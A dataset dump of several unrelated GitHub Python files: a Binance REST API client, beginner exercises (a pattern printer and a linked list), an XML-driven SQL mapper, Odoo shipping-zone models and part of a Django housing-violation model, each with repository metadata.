**connect_params)\n\t\t'''\n\t\tasync with ClientSession() as self.session:\n\t\t\tawait asyncio.sleep('always')\n\t\t'''\n\t\t\n\tdef connect_nowait(self, **connect_params):\n\t\tprint('connect')\n\t\tif self.connected or self.closed:\n\t\t\traise Exception('method \"connect\" has already been used')\n\t\tself.active = True\n\t\tself.semaphore = asyncio.Semaphore(self.semaphore_value)\n\t\tself.session = ClientSession(**connect_params)\n\t\tself.connected = True\n\t\t\n\n\t@disconnect_deco\n\tasync def disconnect(self, wait_for_responses=True):\n\n\t\tawait self.session.close()\n\n\t\twhile self.get_tasks:\n\t\t\tawait asyncio.sleep(0.1)\n\t\tself.active = False\n\t\t\n\tasync def close(self):\n\t\tawait self.disconnect()\n\n\tdef send_request(self, request, callback, track_id, request_params, timeout=None):\n\t\tcallback = self.set_task_removing_extension_to_callback(callback, track_id)\n\t\tget_task = asyncio.create_task(self.get(request, callback, timeout, request_params=request_params))\n\t\tself.get_tasks[track_id] = get_task\n\t\treturn get_task\n\n\tdef set_task_removing_extension_to_callback(self, callback, track_id):\n\t\tdef callback_extended(msg):\n\t\t\tself.get_tasks.pop(track_id)\n\t\t\treturn callback(msg)\n\n\t\treturn callback_extended\n\n\tasync def get(self, request, callback, timeout=None, **about_request):\n\t\tdefault_timeout=30\n\t\tasync with self.semaphore:\n\t\t\tresponse = None\n\t\t\ttry:\n\t\t\t\t#print('sending_request')\n\t\t\t\t#print(request)\n\t\t\t\treq_coro=asyncio.create_task(self.session.get(request, timeout=timeout or default_timeout))\n\t\t\t\tself.request_coros.add(req_coro)\n\t\t\t\tresponse = await asyncio.wait_for( req_coro, 30 )\n\t\t\t\tself.request_coros.remove(req_coro)\n\t\t\t\t#print('response recieved')\n\n\t\t\texcept asyncio.exceptions.TimeoutError as TimeoutError:\n\t\t\t\t#print('response failed')\n\t\t\t\tresult = {\n\t\t\t\t\t'msg_tp': 'error',\n\t\t\t\t\t'msg': TimeoutError,\n\t\t\t\t\t'status_code': -2,\n\t\t\t\t\t'request': request,\n\t\t\t\t\t**about_request,\n\t\t\t\t\t'tm': time.time()\n\t\t\t\t}\n\n\n\t\t\texcept ClientConnectorError as conn_error:\n\t\t\t\t#print('response failed')\n\t\t\t\t# self.E=E\n\t\t\t\tresult = {'msg_tp': 'error',\n\t\t\t\t\t\t 'msg': conn_error,\n\t\t\t\t\t\t 'status_code': 0,\n\t\t\t\t\t\t 'request': request,\n\t\t\t\t\t\t **about_request,\n\t\t\t\t\t\t 'tm': time.time()}\n\t\t\texcept Exception as E:\n\t\t\t\t#print('response failed')\n\t\t\t\tresult = {\n\t\t\t\t\t'msg_tp': 'error',\n\t\t\t\t\t'msg': E,\n\t\t\t\t\t'status_code': -1,\n\t\t\t\t\t'request': request,\n\t\t\t\t\t**about_request,\n\t\t\t\t\t'tm': time.time()\n\t\t\t\t}\n\t\t\tfinally:\n\t\t\t\tif response:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tresult = {\n\t\t\t\t\t\t\t'msg_tp': 'unknown',\n\t\t\t\t\t\t\t'msg': await response.json(),\n\t\t\t\t\t\t\t'headers': response.headers,\n\t\t\t\t\t\t\t'status_code': response.status,\n\t\t\t\t\t\t\t'request': request,\n\t\t\t\t\t\t\t** about_request,\n\t\t\t\t\t\t 'tm': time.time()\n\t\t\t\t\t\t}\n\t\t\t\t\texcept Exception as E:\n\t\t\t\t\t\tresult = {\n\t\t\t\t\t\t\t'msg_tp': 'unknown',\n\t\t\t\t\t\t\t'msg':E,\n\t\t\t\t\t\t\t'headers': response.headers,\n\t\t\t\t\t\t\t'status_code': response.status,\n\t\t\t\t\t\t\t'request': request,\n\t\t\t\t\t\t\t** about_request,\n\t\t\t\t\t\t\t'tm': time.time()\n\t\t\t\t\t\t}\n\t\t\t\t\tfinally:\n\t\t\t\t\t\tresponse.close()\n\n\t\t\t\tdecoded = self.decode(result)\n\t\t\t\tparsed = self.parse(decoded)\n\t\t\t\tcallback(parsed)\n\t\t\t# self.response=response\n\n\tdef generate_requests(self, requests_params):\n\t\treturn [self.generate_request(request_params) for request_params in requests_params]\n\n\tdef generate_request(self, request_params):\n\t\t#print(request_params)\n\t\t# self.requests_params_map[track_id]=request_params\n\n\t\treq_tp = request_params['req_tp']\n\t\tdata_tp = request_params['data_tp']\n\t\ttemplate_info = self.templates[data_tp][req_tp]\n\t\tinsert_params = []\n\t\t#print(request_params)\n\t\tfor param in template_info['order']:\n\t\t\tparam_value = request_params.get(param)\n\t\t\tif param_value is None:\n\t\t\t\tparam_value = template_info['default'][param]\n\t\t\telif param == 'market':\n\t\t\t\tparam_value = self.symbol_to_exfrmt(param_value)\n\t\t\tparam_value = template_info['apply'].get(param, lambda value: value)(param_value)\n\t\t\tinsert_params.append(param_value)\n\t\t#print(insert_params)\n\t\trequest = self.url + template_info['request_postfix'] % tuple(insert_params)\n\t\t#print(request)\n\t\treturn request\n\n\tdef decode(self, raw):\n\t\treturn raw\n\n\tdef parse(self, msg):\n\t\tparsed_msg = {}\n\t\ttry:\n\t\t\tmsg_tp = self.indentify_msg_tp(msg)\n\t\t\tparsed_msg = {\n\t\t\t\t'tp': msg_tp,\n\t\t\t\t**self.on_incoming_msgs_methods[msg_tp](msg),\n\t\t\t\t'tm': msg['tm']\n\t\t\t}\n\t\t\treturn parsed_msg\n\t\texcept Exception as E:\n\t\t\treturn self.return_parsing_error(msg, E)\n\n\tdef indentify_msg_tp(self, msg):\n\t\tif msg['msg_tp'] == 'unknown':\n\t\t\tif msg[\n\t\t\t\t'status_code'] == 200: # для окекса 200 может прийти если запршенна япара не сущеммствует или в запросе отсвуют требуеые параметры\n\t\t\t\tmsg_tp = 'data'\n\t\t\telse:\n\t\t\t\tmsg_tp = 'error'\n\t\t\treturn msg_tp\n\t\telse:\n\t\t\treturn msg['msg_tp']\n\n\tdef parse_data(self, msg):\n\t\tdata_tp = self.identify_data_tp(msg)\n\t\tparsed_data = {\n\t\t\t'data': self.on_data_methods[data_tp](msg)\n\t\t}\n\t\treturn parsed_data\n\n\tdef identify_data_tp(self, msg):\n\t\tdata_tp = msg['request_params']['data_tp']\n\t\treturn data_tp\n\n\tdef parse_data_orderbook(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_trades(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_tickers_CHL(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_tickers_C(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_markets(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_ohlcv(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_error(self, msg):\n\t\terror_tp = self.indentify_error_tp(msg)\n\t\tparsed_error = {\n\t\t\t'error_tp': error_tp,\n\t\t\t'msg': msg['msg'],\n\t\t\t'about_msg': {\n\t\t\t\t'headers': msg.get('headers'),\n\t\t\t\t'status_code': msg['status_code'],\n\t\t\t\t'request': msg['request']\n\t\t\t}\n\t\t}\n\t\treturn parsed_error\n\n\tdef indentify_error_tp(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_decode_error(self, msg):\n\t\tpass\n\n\tdef return_parsing_error(self, msg, E):\n\t\treturn {\n\t\t\t\n\t\t\t'tp': 'parsing_error',\n\t\t\t'exception': E,\n\t\t\t'unparsed': msg,\n\t\t\t'tm': msg['tm']\n\t\t}\n\n\tdef symbol_to_exfrmt(self, symbol):\n\t\tbase, quote = self.extract_basequote_infrmt(symbol)\n\t\tsymbol = self.join_basequote_exfrmt(base, quote)\n\t\treturn symbol\n\n\tdef symbol_to_infrmt(self, symbol):\n\t\t#print(symbol)\n\t\tbase, quote = self.extract_basequote_exfrmt(symbol)\n\t\tsymbol = self.join_basequote_infrmt(base, quote)\n\t\treturn symbol\n\n\tdef extract_basequote_infrmt(self, symbol):\n\t\tquote, base = symbol.split('-')\n\t\treturn base, quote\n\n\tdef extract_basequote_exfrmt(self, symbol):\n\t\tbasequote = self.basequote_map.get(symbol)\n\t\t#print(basequote)\n\t\tif not basequote:\n\t\t\traise SymbolParsingError()\n\t\tbase, quote = basequote\n\t\treturn base, quote\n\n\tdef join_basequote_infrmt(self, base, quote):\n\t\treturn f'{quote}-{base}'\n\n\tdef pass_basequote_map(self, basequote_map):\n\t\tself.basequote_map.update(basequote_map)\n\n\tdef update_basequote_map(self, exfrmt, base, quote):\n\t\tself.basequote_map.update({exfrmt:(base.upper(), quote.upper())})\nimport numpy as np\nclass Connection(Connection_rest):\n\turl = 'https://api.binance.com'\n\n\ttemplates = {\n\t\t'markets': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/exchangeInfo',\n\t\t\t\t'order': [],\n\t\t\t\t'default': {},\n\t\t\t\t'requared': [],\n\t\t\t\t'apply': {}\n\t\t\t}\n\t\t},\n\t\t'orderbook': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/depth?symbol=%s&limit=%s',\n\t\t\t\t'order': ['market', 'depth'],\n\t\t\t\t'default': {'depth': 1000},\n\t\t\t\t'requared': ['market'],\n\t\t\t\t'apply': {}\n\t\t\t}\n\t\t},\n\n\t\t'trades': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/trades?symbol=%s&limit=%s',\n\t\t\t\t# historicalTrades для того чтобы достатать боле естарые данные на днынй момент не реализованно так как требует X-MBX-APIKEY\n\t\t\t\t'order': ['market', 'limit'],\n\t\t\t\t'default': {'limit': 1000},\n\t\t\t\t'requared': ['market'],\n\t\t\t\t'apply': {}\n\t\t\t}\n\t\t},\n\n\t\t'tickers_CHL': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/ticker/24hr%s',\n\t\t\t\t'order': ['market'],\n\t\t\t\t'default': {'market': ''},\n\t\t\t\t'requared': [],\n\t\t\t\t'apply': {\n\t\t\t\t\t'market': lambda value: '?symbol=%s' % value if value else ''\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\n\t\t'tickers_C': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/ticker/price%s',\n\t\t\t\t'order': ['market'],\n\t\t\t\t'default': {'market': ''},\n\t\t\t\t'requared': [],\n\t\t\t\t'apply': {\n\t\t\t\t\t'market': lambda value: '?symbol=%s' % value if value else ''\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\t\t'ohlcv': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/uiKlines?symbol=%s&interval=%s&limit=%s%s%s',\n\t\t\t\t'order':['market', 'interval', 'limit', 'start', 'end'],\n\t\t\t\t'default': {'interval': '1m', 'limit': 1000, 'start': None, 'end': None},\n\t\t\t\t'requared': ['market'],\n\t\t\t\t'apply': {\n\t\t\t\t\t\t'start': lambda value: '&startTime=%s' % value if value!=None else '',\n\t\t\t\t\t\t'end':lambda value: '&endTime=%s' % value!=None if value else ''\n\t\t\t\t }\n\t\t\t}\n\t\t}\n\t}\n\t\n\n\n\tmarket_activity_map={'TRADING':True }\n\n\t# {symbols_converting}\n\n\tdef join_basequote_exfrmt(self, base, quote):\n\t\texfrmt = f'{base}{quote}'\n\t\tif not self.basequote_map.get(exfrmt):\n\t\t\tself.basequote_map[exfrmt] = (base, quote)\n\t\treturn exfrmt\n\n\n\n\t#\n\n\tdef parse_data_orderbook(self, msg):\n\t\ttm = dtHttp_to_dt64(msg['headers']['Date'])\n\t\treceived_at = np.datetime64(np.datetime64(int(msg['tm'] * 1000), 'ms'))\n\t\tmarket = msg['request_params']['market']\n\t\torderbook_raw = msg['msg']\n\t\tid = msg['msg'][\"lastUpdateId\"]\n\t\torderbook = {\n\t\t\t'id': id,\n\t\t\t'tm': tm,\n\t\t\t'bids': [[float(delta[0]), float(delta[1])] for delta in orderbook_raw['bids']],\n\t\t\t'asks': [[float(delta[0]), float(delta[1])] for delta in orderbook_raw['asks']],\n\t\t\t'received_at': received_at,\n\t\t}\n\t\treturn orderbook\n\n\tdef parse_data_markets(self, msg):\n\t\tmarkets_info_raw = msg['msg']['symbols']\n\t\tbasequote_map = {}\n\n\t\tmarkets_info = {}\n\t\tfor market_info_raw in markets_info_raw:\n\n\t\t\tsymbol_exfrmt = market_info_raw[\"symbol\"]\n\t\t\tbase = market_info_raw[\"baseAsset\"]\n\t\t\tquote = market_info_raw[\"quoteAsset\"]\n\t\t\tself.update_basequote_map(symbol_exfrmt, base, quote)\n\t\t\tmarket=self.symbol_to_infrmt(symbol_exfrmt)\t\t\t\n\t\t\tif not 'SPOT' in market_info_raw['permissions']:\n\t\t\t\tcontinue\n\t\t\tmarkets_info[market] = {\n\t\t\t\t'market':market,\n\t\t\t\t'symbol':symbol_exfrmt,\n\t\t\t\t'base': base,\n\t\t\t\t'quote': quote,\n\t\t\t\t'created_at': None,\n\t\t\t\t'is_active': self.market_activity_map.get(market_info_raw['status'], False),\n\t\t\t\t'status':market_info_raw['status']\n\t\t\t}\n\n\t\treturn markets_info\n\n\tdef parse_data_trades(self, msg):\n\t\t\"\"\" aggtrade:{'a': 330231197,\n\t\t\t 'p': '0.07460300',\n\t\t\t 'q': '1.50790000',\n\t\t\t 'f': 393565003,\n\t\t\t 'l': 393565004,\n\t\t\t 'T': 1670096404349,\n\t\t\t 'm': True,\n\t\t\t 'M': True}\"\"\"\n\t\n\t\ttrades_raw = msg['msg']\n\t\tmarket = msg['request_params']['market']\n\n\t\ttrades = []\n\t\tfor trade_raw in trades_raw:\n\t\t\ttrade = {\n\t\t\t\t'id': trade_raw['id'],\n\t\t\t\t'tm': np.datetime64(trade_raw['time'], 'ms'),\n\t\t\t\t'Q': float(trade_raw['qty']),\n\t\t\t\t'R': float(trade_raw['price']),\n\t\t\t\t'buyer_maker': trade_raw['isBuyerMaker'],\n\t\t\t\t'custom': {\n\t\t\t\t\t'bid_id': None,\n\t\t\t\t\t'ask_id': None,\n\t\t\t\t\t'event_tm': None,\n\t\t\t\t\t'best_match': trade_raw['isBestMatch']\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ttrades.append(trade)\n\t\treturn trades\n\n\tdef parse_data_tickers_C(self, msg):\n\t\ttickers_raw = msg['msg']\n\t\tif isinstance(tickers_raw, dict):\n\t\t\treturn float(tickers_raw['price'])\n\t\ttickers = []\n\t\tfor ticker_raw in tickers_raw:\n\t\t\tticker = {\n\t\t\t\t'market': self.symbol_to_infrmt(ticker_raw['symbol']),\n\t\t\t\t'C': float(ticker_raw['price'])\n\t\t\t}\n\t\t\ttickers.append(ticker)\n\t\treturn tickers\n\n\tdef parse_data_tickers_CHL(self, msg):\n\t\t# [{\"symbol\":\"1INCH-BTC\",\"lastTradeRate\":\"0.00011424\",\"bidRate\":\"0.00011471\",\"askRate\":\"0.00011505\"},]\n\t\ttickers_raw = msg['msg']\n\t\ttickers = []\n\t\tfor ticker_raw in tickers_raw:\n\t\t\tticker = {\n\t\t\t\t'market': self.symbol_to_infrmt(ticker_raw['symbol']),\n\t\t\t\t'C': float(ticker_raw['lastPrice']),\n\t\t\t\t'H': float(ticker_raw['bidPrice']),\n\t\t\t\t'L': float(ticker_raw['askPrice'])\n\t\t\t}\n\t\t\ttickers.append(ticker)\n\t\treturn tickers\n\n\tdef parse_data_ohlcv(self, msg):\n\t\t'''\n\t\t[\n\t\t [\n\t\t\t1499040000000,\t // 0\tOpen time\n\t\t\t\"0.01634790\",\t // 1\tOpen\n\t\t\t\"0.80000000\",\t // 2\tHigh\n\t\t\t\"0.01575800\",\t // 3\tLow\n\t\t\t\"0.01577100\",\t // 4\tClose\n\t\t\t\"148976.11427815\", // 5\tVolume\n\t\t\t1499644799999,\t // 6\tClose time\n\t\t\t\"2434.19055334\",\t// 7\tQuote asset volume\n\t\t\t308,\t\t\t\t// 8\tNumber of trades\n\t\t\t\"1756.87402397\",\t// 9\tTaker buy base asset volume\n\t\t\t\"28.46694368\",\t // 10\tTaker buy quote asset volume\n\t\t\t\"17928899.62484339\" // 11\tIgnore.\n\t\t ]\n\t\t]\n\t\t'''\n\t\tohlcv_raw = msg['msg']\n\t\tohlcv = []\n\t\tfor kline_raw in ohlcv_raw:\n\t\t\tkline = {\n\t\t\t\t'open_tm': kline_raw[0],\n\t\t\t\t'close_tm': kline_raw[6],\n\t\t\t\t'o': float(kline_raw[1]),\n\t\t\t\t'h': float(kline_raw[2]),\n\t\t\t\t'l': float(kline_raw[3]),\n\t\t\t\t'c': float(kline_raw[4]),\n\t\t\t\t'qv': float(kline_raw[7]),\n\t\t\t\t'bv': float(kline_raw[5]),\n\t\t\t\t'custom': {\n\t\t\t\t\t'trades_count': kline_raw[8],\n\t\t\t\t\t'bv_tacker_buy': float(kline_raw[9]),\n\t\t\t\t\t'qv_tacker_buy': float(kline_raw[10]),\n\t\t\t\t}\n\t\t\t}\n\t\t\tohlcv.append(kline)\n\t\treturn ohlcv\n\n\tdef indentify_error_tp(self, msg):\n\t\t# raw = msg['msg']\n\t\tstatus_code = msg['status_code']\n\t\tif status_code == 0:\n\t\t\treturn 'network_down'\n\t\tif status_code == -2:\n\t\t\treturn 'timeout_error'\n\t\tif status_code == 403:\n\t\t\treturn 'FAW_lock'\n\t\tif status_code == 429:\n\t\t\treturn 'too_many_requests'\n\t\tif status_code==418:\n\t\t\treturn 'too_many_requests'\n\t\tif status_code == 503:\n\t\t\treturn 'service_unavailable'\n\t\tif status_code >= 500:\n\t\t\treturn 'repeat'\n\n\t\tif isinstance(msg['msg'], dict):\n\t\t\terr_code = msg['msg'].get('code')\n\n\t\t\tif err_code:\n\t\t\t\tif err_code == -1000:\n\t\t\t\t\treturn 'repeat'\n\t\t\t\tif err_code == -1001:\n\t\t\t\t\treturn 'repeat'\n\t\t\t\tif err_code == -1003:\n\t\t\t\t\treturn 'too_many_requests'\n\t\t\t\tif err_code == -1004:\n\t\t\t\t\treturn 'repeat'\n\t\t\t\tif err_code == -1121:\n\t\t\t\t\treturn 'invalid_market'\n\t\treturn 'unknown_error'\n\n\n\tdef parse_decode_error(self, msg):\n\t\tpass\n\n\n\tdef return_parsing_error(self, msg, E):\n\t\treturn {\n\t\t'tp': 'parsing_error',\n\t\t'exception': E,\n\t\t'raw': msg,\n\t\t'tm': msg['tm']\n\t\t}\n\n# def symbol_to_infrmt(self, market):\n#\treturn '-'.join(reversed(market.split('-')))\n\n\n\n\n\n\n","repo_name":"iss2g/test-task","sub_path":"app/binance_interface/rest/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":24389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"73901563593","text":"# pattern problem\n\n\nnum = int(input(\"Enter the number: \"))\nprint(\"PRESS\")\ndecide = int(input(\"1. Upper Triangle\\n0. Lower Triangle\\n\"))\n\nnew = bool(decide)\n\nif new == True:\n # print(\"you entered 1\")\n for i in range(num):\n for j in range(i+1):\n print(\"# \", end=\"\")\n print()\n \nelif new == False:\n # print(\"you are in 2\")\n for i in range(num):\n for j in range(num-i):\n print(\"# \", end=\"\")\n print()\n\nelse:\n print(\"invalid!!\")\n","repo_name":"ujjwalbhandarii/RAW","sub_path":"py/exercise/PatternProblem.py","file_name":"PatternProblem.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"72532924871","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass SingleLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def insertBeginning(self, data):\r\n nb = Node(data)\r\n nb.next = self.head\r\n self.head = nb\r\n\r\n def insertAtPosition(self, data, position):\r\n np = Node(data)\r\n temp = self.head\r\n for i in range(position-1):\r\n temp = temp.next\r\n np.data = data\r\n np.next = temp.next\r\n temp.next = np\r\n\r\n def insertAtEnd(self, data):\r\n ne = Node(data)\r\n temp = self.head\r\n while temp.next:\r\n temp = temp.next\r\n temp.next = ne\r\n\r\n def display(self):\r\n if self.head is None:\r\n print(\"The List is Empty\")\r\n else:\r\n temp = self.head\r\n while temp:\r\n if temp.next is not None:\r\n print(temp.data, \"--->\", end=\" \")\r\n temp = temp.next\r\n else:\r\n print(temp.data)\r\n temp = temp.next\r\n\r\n\r\nL = SingleLinkedList()\r\nn1 = Node(10)\r\nL.head = n1\r\nn2 = Node(20)\r\nL.head.next = n2\r\nL.display()\r\n\r\nn = int(input(\"Enter the number of new elements to be added to the list:\"))\r\nprint(\"1-Insert Element at the beginning of the List\")\r\nprint(\"2-Insert Element at the end of the List\")\r\nprint(\"3-Insert Element at a specified position in the List\")\r\nwhile n != 0:\r\n choice = int(input(\"Enter your Choice:\"))\r\n if choice == 1:\r\n element = int(input(\"Enter the element to be inserted at the beginning:\"))\r\n L.insertBeginning(element)\r\n L.display()\r\n elif choice == 2:\r\n element = int(input(\"Enter the element to be inserted at the end:\"))\r\n L.insertAtEnd(element)\r\n L.display()\r\n elif choice == 3:\r\n element = int(input(\"Enter the element to be inserted at the specified position:\"))\r\n posn = int(input(\"Enter the position to insert the element:\"))\r\n L.insertAtPosition(element, posn)\r\n L.display()\r\n else:\r\n print(\"Enter the correct option\")\r\n\r\n n -= 1\r\n","repo_name":"Aaronphilip2003/Data-Structs-Algo-PYTHON","sub_path":"Insertion-N-times.py","file_name":"Insertion-N-times.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11560488227","text":"# -*- coding:utf-8 -*-\nimport re\nfrom xml.dom.minidom import parse, Node\nimport xml.dom.minidom\nfrom dbutil import DBUtils\nfrom model import *\n\n\"\"\"\n\n\n\n\n\"\"\"\n\n\nclass Constant:\n id = 'id'\n namespace = 'namespace'\n mapper = 'mapper'\n label_sql = 'sql'\n label_where = 'where'\n label_if = 'if'\n label_for = 'for'\n label_include = 'include'\n label_update = 'update'\n label_delete = 'delete'\n label_select = 'select'\n label_insert = 'insert'\n op_label = [label_delete, label_insert, label_select, label_update]\n\n\nclass XmlNode:\n\n def __init__(self, namespace=None, id=None, op=None, attrs=None, vars=None, data=None):\n self.namespace = namespace\n self.id = id\n self.op = op\n self.attrs = attrs\n self.vars = vars\n self.data = data\n\n def __str__(self):\n return '[id: %s、op: %s、attrs: %s、vars: %s、 data: %s]' % (self.id, self.op, self.attrs, self.vars, self.data)\n\n\nclass XmlParsingError(Exception):\n\n def __init__(self, info):\n super(XmlParsingError, self).__init__(info)\n\n\nclass MapperParse:\n\n def __init__(self, xmls):\n self.xmls = xmls\n self.mappers = {}\n\n def parse(self):\n for xPath in xmls:\n dom_tree = xml.dom.minidom.parse(xPath)\n root = dom_tree.documentElement\n\n if root.hasAttribute(Constant.namespace):\n namespace = root.getAttribute(Constant.namespace)\n else:\n raise XmlParsingError('Empty namespace!')\n\n child_nodes = root.childNodes\n for node in child_nodes:\n xmlNode = XmlNode()\n xmlNode.namespace = namespace\n # select/insert/update/delete\n if node.nodeType == Node.ELEMENT_NODE and node.nodeName in Constant.op_label:\n xmlNode.op = node.nodeName\n if not node.hasAttribute(Constant.id):\n raise XmlParsingError('id is null!')\n xmlNode.id = node.getAttribute(Constant.id)\n attrs = node.attributes\n # parse attrs\n if attrs:\n m_attrs = {}\n for idx in range(attrs.length):\n if attrs.item(idx).name != Constant.id:\n m_attrs[attrs.item(idx).name] = attrs.item(idx).value\n xmlNode.attrs = m_attrs\n\n xmlNode.data = node.childNodes\n self.mappers[xmlNode.namespace + '.' + xmlNode.id] = xmlNode\n\n\nclass EasyDB:\n\n def __init__(self, path, xmls):\n self.dbutil = DBUtils()\n self.dbutil.set_instance(path)\n self.mp = MapperParse(xmls)\n self.mp.parse()\n\n def exec(self, sql, data=None):\n return self.dbutil.execute(sql, data)\n\n\npath = '../../resources/stock.db3'\nxmls = [\"stock_map.xml\"]\ndb = EasyDB(path, xmls)\n\n\ndef mapper(*args, **kargs):\n global db\n\n def decorator(func):\n node = db.mp.mappers.get(func.__qualname__)\n if not node:\n raise XmlParsingError('No method mapper: <%s>' % func.__qualname__)\n\n def _invoke(**margs):\n strSql = ''\n for n in node.data:\n if n.nodeType == Node.TEXT_NODE:\n data = n.data.strip()\n if len(data) > 1:\n strSql += data\n parms = re.findall(r'#{(.+?)}', strSql)\n pas = []\n for p in parms:\n if not margs.get(p.strip()):\n raise Exception('')\n # prevent SQL injection\n strSql = strSql.replace('#{' + p + '}', \"?\")\n pas.append(margs.get(p.strip()))\n return db.exec(sql=strSql, data=tuple(pas))\n\n return _invoke\n\n return decorator\n\n\ndef test():\n class Mapper:\n\n @mapper(sql=\"select * from tb_stock_info\")\n def selecTest(**kw): pass\n\n class Stock(Model):\n id = Int('id')\n code = Varchar('code')\n\n st = Stock(id=2, code='603161')\n rs = Mapper.selecTest(**st)\n print()\n print(\"Result: \", rs)\n","repo_name":"bingdyee/pybatis","sub_path":"v1/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"26652606611","text":"from odoo import fields, models, api, _\nfrom odoo.exceptions import UserError, Warning\nimport re\n\n\nclass ShippingZone(models.Model):\n \"\"\"\n Models zones that groups different postal codes in a country given a transporter\n \"\"\"\n _name = 'shipping.zone'\n\n name = fields.Char(string='Name')\n transporter_id = fields.Many2one('res.partner', string='Transporter', domain=[('is_transporter', '=', True)])\n country_id = fields.Many2one('res.country', string='Country')\n postal_code_ids = fields.One2many('postal.code.range', 'shipping_zone_id', string='Postal Codes')\n shipping_cost_ids = fields.One2many('shipping.cost', 'shipping_zone_id', string='Shipping costs')\n\n def is_postal_code_in_zone(self, code_to_check):\n \"\"\"\n Checks if the given postal code is in this zone.\n NOTE: We assume code_to_check fts with postal code's format\n\n Parameters\n ----------\n code_to_check:\n string with the postal code to check\n\n Returns\n -------\n If code_to_check in zone postal codes\n \"\"\"\n for postal_code_range in self.postal_code_ids:\n if postal_code_range.is_postal_code_in_range(code_to_check):\n return True\n return False\n\n\nclass PostalCodeRange(models.Model):\n \"\"\"\n Models a range of postal codes. It is related to a location_zone.\n \"\"\"\n _name = 'postal.code.range'\n\n first_code = fields.Char(string='First', size=10, required=True)\n last_code = fields.Char(string='Last', size=10, required=True)\n shipping_zone_id = fields.Many2one('shipping.zone', string='Zone')\n postal_code_format_id = fields.Many2one(\n str='Postal code format',\n related='shipping_zone_id.country_id.postal_code_format_id', readonly=True\n )\n\n def is_postal_code_in_range(self, code_to_check):\n \"\"\"\n Checks if the given postal code is in this postal_code_range.\n\n Parameters\n ----------\n code_to_check:\n string with the postal code to check\n\n Returns\n -------\n If code_to_check in [first_code, last_code]\n \"\"\"\n return self.first_code <= code_to_check <= self.last_code\n\n @api.multi\n @api.constrains('first_code', 'last_code')\n def check_postal_codes(self):\n \"\"\"\n Checks if the range is correctly created:\n - code is a numerical str\n - first_code <= last_code\n \"\"\"\n for postal_code_range in self:\n if not re.match(postal_code_range.postal_code_format_id.regex, postal_code_range.first_code):\n raise UserError(_(\n 'Not valid postal code value: \"%s\". Please, try using one like this \"%s\"') % (\n postal_code_range.first_code, postal_code_range.postal_code_format_id.postal_code_sample\n ))\n if not re.match(postal_code_range.postal_code_format_id.regex, postal_code_range.last_code):\n raise UserError(_(\n 'Not valid postal code value: \"%s\". Please, try using one like this \"%s\"') % (\n postal_code_range.last_code, postal_code_range.postal_code_format_id.postal_code_sample\n ))\n if postal_code_range.first_code > postal_code_range.last_code:\n raise Warning(_('Error!:: End code is lower than first code.'))\n\n\nclass PostalCodeFormat(models.Model):\n \"\"\"\n Models the format that a Postal Code must have\n \"\"\"\n _name = 'postal.code.format'\n\n name = fields.Char(string='Name')\n country_ids = fields.One2many('res.country', 'postal_code_format_id', string='Country')\n regex = fields.Char(\n string='Regular expression',\n help='With this regular expression you will tell how is the format of the postal code.'\n )\n postal_code_sample = fields.Char(\n string='Code Sample',\n help='An example of how the postal code format must be.'\n )\n\n @api.multi\n @api.constrains('regex', 'postal_code_sample')\n def check_postal_code_sample(self):\n \"\"\"\n Checks if the postal_code_sample chosen fits with the regex\n \"\"\"\n for code_format in self:\n if not re.match(code_format.regex, code_format.postal_code_sample):\n raise UserError(_(\n 'Not valid postal code sample: \"%s\"') % code_format.postal_code_sample)\n\n\nclass Country(models.Model):\n _inherit = 'res.country'\n\n shipping_zone_ids = fields.One2many('shipping.zone', 'country_id', string='Zone')\n postal_code_format_id = fields.Many2one(\n 'postal.code.format',\n string='Postal Code Format'\n )\n\n","repo_name":"Naferreyra/CMNT_004_15","sub_path":"project-addons/shipping_costs/models/zone.py","file_name":"zone.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"36238451199","text":"from django.db import models\nfrom datasets.utils.BaseDatasetModel import BaseDatasetModel\nfrom core.utils.transform import from_csv_file_to_gen\nfrom datasets.utils.validation_filters import is_null, is_older_than\nfrom django.dispatch import receiver\nfrom core.tasks import async_download_and_update\nfrom datasets import models as ds\nimport logging\nlogger = logging.getLogger('app')\n\n\nclass HPDViolation(BaseDatasetModel, models.Model):\n class Meta:\n indexes = [\n models.Index(fields=['bbl', '-approveddate']),\n models.Index(fields=['-approveddate']),\n ]\n\n API_ID = 'wvxf-dwi5'\n QUERY_DATE_KEY = 'approveddate'\n EARLIEST_RECORD = '1933-01-01'\n\n download_endpoint = \"https://data.cityofnewyork.us/api/views/wvxf-dwi5/rows.csv?accessType=DOWNLOAD\"\n\n violationid = models.IntegerField(\n primary_key=True, blank=False, null=False)\n bbl = models.ForeignKey('Property', db_column='bbl', db_constraint=False,\n on_delete=models.SET_NULL, null=True, blank=False)\n bin = models.ForeignKey('Building', 